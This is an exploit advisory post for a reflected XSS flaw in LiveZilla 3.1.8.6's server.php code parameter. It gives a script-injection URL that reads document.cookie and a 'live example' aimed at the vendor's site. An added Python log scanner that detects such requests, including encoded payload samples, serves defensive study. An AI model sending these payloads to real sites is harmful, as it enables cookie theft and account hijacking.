LiveZilla 3.1.8.6 - Cross Site Scripting (XSS) Vulnerability

Posted by bursali | Posted in Exploits | Posted on 27.05.2010 @ 18:22:42

	.o8                                               oooo   o8o
	"888                                               `888   `"'
	888oooo.  oooo  oooo  oooo d8b  .oooo.o  .oooo.    888  oooo
	d88' `88b `888  `888  `888""8P d88(  "8 `P  )88b   888  `888
	888   888  888   888   888     `"Y88b.   .oP"888   888   888
	888   888  888   888   888     o.  )88b d8(  888   888   888
	`Y8bod8P'  `V88V"V8P' d888b    8""888P' `Y888""8o o888o o888o
########################### INFORMATION ########################################
#
#
# [+] Exploit Title: LiveZilla 3.1.8.6 - Cross Site Scripting (XSS) Vulnerability
# [+] Date: 25-05-2010
# [+] Author: bursali | admin[at]bursali.eu | www.bursali.eu
# [+] Software Link: http://www.livezilla.net/
# [+] Version: 3.1.8.6
# [+] Tested on: PHP
# [+] Dork: Use your brain (;
#
# [?] Greetz to: GabberGandalf, fred777, J0hn.X3r, Montaxx, Dexx, DeeWayne,
#                Nazrek, Sawyer, VeN0m, Lidloses_Auge, Suicide, Toastbrot,
#		 soulstoned enco, DizzY_D, Zikke, n0ne-crew, Free-Hack
#		 and the wh0le other morons ;D
#
#
#################################################################################
########################## Exploit #############################
It's a basic Cross Site Scripting vulnerability in the code parameter of server.php (;
Example:
http://[server]/[Livezilla Directory]/server.php?request=track&output=jcrpt&code=[XSS]&nse=
Live Example:
http://www.livezilla.net/livezilla/server.php?request=track&output=jcrpt&code=%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&nse=
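Added example, not part of the original advisory or of LiveZilla's code: a Python check that scans web server access logs for requests of the shape shown above and reports code values that carry markup characters, including double-encoded ones. The combined log format, the sample log lines and the assumption that legitimate code values never contain markup are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a value break out of an HTML or script context.
# Assumption: legitimate `code` values never contain them.
MARKUP_RE = re.compile(r"[<>\"'`]")


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %253C is seen as '<'."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def suspicious_code_param(log_line):
    """Decoded `code` value if a request=track hit carries markup, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith("/server.php"):
        return None
    params = parse_qs(target.query, keep_blank_values=True)
    if "track" not in params.get("request", []):
        return None
    # `output` is not checked, so variants of the request are not missed.
    for raw in params.get("code", []):
        value = fully_decode(raw)
        if MARKUP_RE.search(value):
            return value
    return None


# Constructed sample log lines (documentation IP range, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/May/2010:18:20:01 +0200] "GET /livezilla/server.php?request=track&output=jcrpt&code=abc123&nse= HTTP/1.1" 200 311',
    '192.0.2.44 - - [27/May/2010:18:22:42 +0200] "GET /livezilla/server.php?request=track&output=jcrpt&code=%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&nse= HTTP/1.1" 200 402',
    '192.0.2.44 - - [27/May/2010:18:23:05 +0200] "GET /livezilla/server.php?request=track&output=jcrpt&code=%2522%253Cscript%253E&nse= HTTP/1.1" 200 355',
    '192.0.2.10 - - [27/May/2010:18:24:00 +0200] "GET /index.php?code=%3Cb%3E HTTP/1.1" 200 900',
]


def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    found = ((n, suspicious_code_param(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in found if v is not None]
```

Calling scan(SAMPLE_LOG) flags the second and third sample lines; the benign hit and the unrelated path are ignored.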
########################## LAST WORDS #############################
Visit www.bursali.eu - Home of the CyberTerrorist <3
~bursali
#####